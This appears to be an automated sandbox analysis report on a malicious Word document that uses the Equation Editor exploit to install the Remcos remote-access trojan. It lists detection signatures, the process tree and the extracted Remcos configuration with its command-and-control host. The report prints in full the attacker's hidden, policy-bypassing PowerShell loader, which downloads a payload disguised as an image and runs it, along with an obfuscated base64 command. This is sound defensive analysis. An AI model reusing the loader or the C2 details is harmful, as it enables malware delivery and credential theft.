Windows Analysis Report
xrrwwstCMd.docx

Overview

General Information

Sample name: xrrwwstCMd.docx (renamed because original name is a hash value)
Original sample name: f27f42ce5ed4153d4d30a383c800b415d4e5b78a08556fa2b4f57bdbb0802a76.docx
Analysis ID: 1508111
MD5: 7a26583595ab1c59cba058c4327335ed
SHA1: a745152360c26a93aa72b4e7bd0b1f69a91226af
SHA256: f27f42ce5ed4153d4d30a383c800b415d4e5b78a08556fa2b4f57bdbb0802a76

Detection

Remcos
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Contains functionality to bypass UAC (CMSTPLUA)
Detected Remcos RAT
Found malware configuration
Malicious sample detected (through community Yara rule)
Microsoft Office launches external ms-search protocol handler (WebDAV)
Multi AV Scanner detection for submitted file
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Sigma detected: Powershell download and load assembly
Sigma detected: Remcos
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Contains an external reference to another file
Contains functionality to inject code into remote processes
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Contains functionality to change the wallpaper
Delayed program exit found
Document exploit detected (process start blacklist hit)
Injects a PE file into a foreign processes
Maps a DLL or memory area into another process
Microsoft Office drops suspicious files
Office drops RTF file
Office equation editor establishes network connection
Office equation editor starts processes (likely CVE-2017-11882 or CVE-2018-0802)
Office viewer loads remote template
Searches for Windows Mail specific files
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Equation Editor Network Connection
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Suspicious Microsoft Office Child Process
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file / registry access)
Tries to steal Mail credentials (via file registry)
Uses dynamic DNS services
Very long command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Yara detected WebBrowserPassView password recovery tool
Abnormal high CPU Usage
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality to read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to launch and control a shell (cmd.exe)
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Document contains Microsoft Equation 3.0 OLE entries
Document misses a certain OLE stream usually present in this Microsoft Office document type
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found decision node followed by non-executed suspicious APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Potentially Suspicious Execution Of Regasm/Regsvcs From Uncommon Location
Sigma detected: Suspicious Office Outbound Connections
Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Keylogger Generic
Yara signature match

Classification

  • System is w7x64
  • WINWORD.EXE (PID: 3320 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)
    • EQNEDT32.EXE (PID: 3680 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
      • wscript.exe (PID: 3744 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\fastgeecleancheckupnewthinkstobege.vbs" MD5: 979D74799EA6C8B8167869A68DF5204A)
        • powershell.exe (PID: 3796 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '[long base64 blob elided]';$OWjuxD = [system.Text.encoding]::Unicode.GetString( [system.Convert]::Frombase64String( $Codigo.replace('? ? ? ? ?','A') ) );powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD MD5: EB32C070E658937AA9FA9F3AE629B2B8)
          • powershell.exe (PID: 3884 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia601706.us.archive.org/2/items/new_image_20240905/new_image.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.CHMR/05/481.142.932.58//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))" MD5: EB32C070E658937AA9FA9F3AE629B2B8)
            • RegAsm.exe (PID: 3988 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 8FE9545E9F72E460723F484C304314AD)
              • RegAsm.exe (PID: 4084 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\ibmyilijkzqgggcoxzdgfu" MD5: 8FE9545E9F72E460723F484C304314AD)
              • RegAsm.exe (PID: 4092 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\kvsjjdtlyhiliuyshkqzizcqbm" MD5: 8FE9545E9F72E460723F484C304314AD)
              • RegAsm.exe (PID: 3088 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\uxxbkweempbqtbmwyvcbtlxzcbqib" MD5: 8FE9545E9F72E460723F484C304314AD)
  • cleanup
Name: Remcos, RemcosRAT
Description: Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers. Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns. Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user. Remcos is developed by the cybersecurity company BreakingSecurity.
Attribution:
  • APT33
  • The Gorgon Group
  • UAC-0050
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
{"Host:Port:Password": "dremom2.duckdns.org:2201:1", "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-OT0ZCG", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
Source | Rule | Description | Author
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B0E0C498.doc | INDICATOR_RTF_MalVer_Objects | Detects RTF documents with non-standard version and embedding one of the objects mostly observed in exploit documents. | ditekSHen
  • 0x1144:$obj1: \objhtml
  • 0x117d:$obj2: \objdata
  • 0x1169:$obj3: \objupdate
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\seethegeecakeisreallynicecakewhicgivingtasteoftherealgeeitscreatingniceforeverygeecakeloverswholoverthgeewhichnewonegetme__________nicecakeeateswellwithgee[1].doc | INDICATOR_RTF_MalVer_Objects | Detects RTF documents with non-standard version and embedding one of the objects mostly observed in exploit documents. | ditekSHen
  • 0x1144:$obj1: \objhtml
  • 0x117d:$obj2: \objdata
  • 0x1169:$obj3: \objupdate
Source | Rule | Description | Author
0000000C.00000002.911284833.00000000006D5000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security
0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security
0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp | Windows_Trojan_Remcos_b296e965 | unknown | unknown
  • 0x6c4b8:$a1: Remcos restarted by watchdog!
  • 0x6ca30:$a3: %02i:%02i:%02i:%03i
Source | Rule | Description | Author
12.2.RegAsm.exe.400000.0.raw.unpack | JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security
12.2.RegAsm.exe.400000.0.raw.unpack | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
12.2.RegAsm.exe.400000.0.raw.unpack | JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security
12.2.RegAsm.exe.400000.0.unpack | JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security
12.2.RegAsm.exe.400000.0.unpack | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security

Exploits

Source: Network Connection; Author: Joe Security; Data: DestinationIp: 85.239.241.184, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 3680, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49169
Source: File created; Author: Joe Security; Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 3680, TargetFilename: C:\Users\user\AppData\Roaming\fastgeecleancheckupnewthinkstobege.vbs

System Summary

Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '[long base64 blob elided; see the powershell.exe (PID: 3796) entry in the process tree]
Source: Network Connection; Author: Max Altgelt (Nextron Systems); Data: DestinationIp: 192.168.2.22, DestinationIsIpv6: false, DestinationPort: 49169, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 3680, Protocol: tcp, SourceIp: 85.239.241.184, SourceIsIpv6: false, SourcePort: 80
Source: Process started; Author: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton; Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia601706.us.archive.org/2/items/new_image_20240905/new_image.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.CHMR/05/481.142.932.58//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia601706.us.archive.org/2/items/new_image_20240905/new_image.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.CHMR/05/481.142.932.58//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '[long base64 blob elided; see the powershell.exe (PID: 3796) entry in the process tree]
Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '[long base64 blob elided; see the powershell.exe (PID: 3796) entry in the process tree]
                    Source: Process started | Author: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io | Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\fastgeecleancheckupnewthinkstobege.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\fastgeecleancheckupnewthinkstobege.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 3680, ParentProcessName: EQNEDT32.EXE, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\fastgeecleancheckupnewthinkstobege.vbs" , ProcessId: 3744, ProcessName: wscript.exe
                    Source: Process started | Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community | Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\fastgeecleancheckupnewthinkstobege.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\fastgeecleancheckupnewthinkstobege.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 3680, ParentProcessName: EQNEDT32.EXE, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\fastgeecleancheckupnewthinkstobege.vbs" , ProcessId: 3744, ProcessName: wscript.exe
                    Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?DY? ? ? ? ?M? ? ? ? ?? ? ? ? ?x? ? ? ? ?Dc? ? ? ? ?M? ? ? ? ?? ? ? ? ?2? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Mg? ? ? ? ?v? ? ? ? ?Gk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0? ? ? ? ?cw? ? ? ? ?v? ? ? ? ?G4? ? ? ? ?ZQB3? ? ? ? ?F8? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?F8? ? ? ? ?Mg? ? ? ? ?w? ? ? ? ?DI? ? ? ? ?N? ? ? ? ?? ? ? ? ?w? ? ? ? ?Dk? ? ? ? ?M? ? ? ? ?? ? ? ? ?1? ? ? ? ?C8? ? ? ? ?bgBl? ? ? ? ?Hc? ? ? ? ?XwBp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?LgBq? ? ? ? ?H? ? ? ? ?? ? ? ? ?Zw? ? ? ? ?n? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?B3? ? ? ? ?GU? ? ? ? ?YgBD? ? ? ? ?Gw? ? ? ? ?aQBl? ? ? ? ?G4? ? ? ? ?d? ? ? ? ?? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?BO? ? ? ? ?GU? ? ? ? ?dw? ? ? ? ?t? ? ? ? ?E8? ? ? ? ?YgBq? ? ? ? ?GU? ? ? ? ?YwB0? ? ? ? ?C? ? ? ? ?? ? ? ? ?UwB5? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0? ? ? ? ?LgBO? ? ? ? ?GU? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?Fc? ? ? ? ?ZQBi? ? ? ? ?EM? ? ? ? ?b? ? ? ? ?Bp? ? ? ? ?GU? ? ? ? ?bgB0? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?QgB5? ? ? ? ?HQ? ? ? ? ?ZQBz? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?CQ? ? ? ? ?dwBl? ? ? ? ?GI? ? ? ? ?QwBs? ? ? ? ?Gk? ? ? ? ?ZQBu? ? ? ? ?HQ? ? ? ? ?LgBE? ? ? ? ?G8? ? ? ? ?dwBu? ? ? ? ?Gw? ? ? ? ?bwBh? ? ? ? ?GQ? ? ? ? ?R? ? ? ? ?Bh? ? ? ? ?HQ? ? ? ? ?YQ? ? ? ? ?o? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?FU? ? ? ? ?cgBs? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBU? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?B0? ? ? ? ?C? ? ? 
? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Fs? ? ? ? ?UwB5? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0? ? ? ? ?LgBU? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?B0? ? ? ? ?C4? ? ? ? ?RQBu? ? ? ? ?GM? ? ? ? ?bwBk? ? ? ? ?Gk? ? ? ? ?bgBn? ? ? ? ?F0? ? ? ? ?Og? ? ? ? ?6? ? ? ? ?FU? ? ? ? ?V? ? ? ? ?BG? ? ? ? ?Dg? ? ? ? ?LgBH? ? ? ? ?GU? ? ? ? ?d? ? ? ? ?BT? ? ? ? ?HQ? ? ? ? ?cgBp? ? ? ? ?G4? ? ? ? ?Zw? ? ? ? ?o? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?EI? ? ? ? ?eQB0? ? ? ? ?GU? ? ? ? ?cw? ? ? ? ?p? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bz? ? ? ? ?HQ? ? ? ? ?YQBy? ? ? ? ?HQ? ? ? ? ?RgBs? ? ? ? ?GE? ? ? ? ?Zw? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?n? ? ? ? ?Dw? ? ? ? ?P? ? ? ? ?BC? ? ? ? ?EE? ? ? ? ?UwBF? ? ? ? ?DY? ? ? ? ?N? ? ? ? ?Bf? ? ? ? ?FM? ? ? ? ?V? ? ? ? ?BB? ? ? ? ?FI? ? ? ? ?V? ? ? ? ?? ? ? ? ?+? ? ? ? ?D4? ? ? ? ?Jw? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?ZQBu? ? ? ? ?GQ? ? ? ? ?RgBs? ? ? ? ?GE? ? ? ? ?Zw? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?n? ? ? ? ?Dw? ? ? ? ?P? ? ? ? ?BC? ? ? ? ?EE? ? ? ? ?UwBF? ? ? ? ?DY? ? ? ? ?N? ? ? ? ?Bf? ? ? ? ?EU? ? ? ? ?T
                    Source: Process started | Author: Nasreddine Bencherchali (Nextron Systems) | Data: Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\ibmyilijkzqgggcoxzdgfu", CommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\ibmyilijkzqgggcoxzdgfu", CommandLine|base64offset|contains: ^, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, ParentCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe", ParentImage: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, ParentProcessId: 3988, ParentProcessName: RegAsm.exe, ProcessCommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\ibmyilijkzqgggcoxzdgfu", ProcessId: 4084, ProcessName: RegAsm.exe
                    Source: Network Connection | Author: X__Junior (Nextron Systems) | Data: DestinationIp: 192.168.2.22, DestinationIsIpv6: false, DestinationPort: 49161, EventID: 3, Image: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, Initiated: true, ProcessId: 3320, Protocol: tcp, SourceIp: 95.217.202.210, SourceIsIpv6: false, SourcePort: 80
                    Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia601706.us.archive.org/2/items/new_image_20240905/new_image.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.CHMR/05/481.142.932.58//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia601706.us.archive.org/2/items/new_image_20240905/new_image.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = 
[System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.CHMR/05/481.142.932.58//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?DY? ? ? ? ?M? ? ? ? ?? ? ? ? ?x? ? ? ? ?Dc? ? ? ? ?M? ? ? ? ?? ? ? ? ?2? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Mg? ? ? ? ?v? ? ? ? ?Gk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0? ? ? ?
                    Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia601706.us.archive.org/2/items/new_image_20240905/new_image.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = 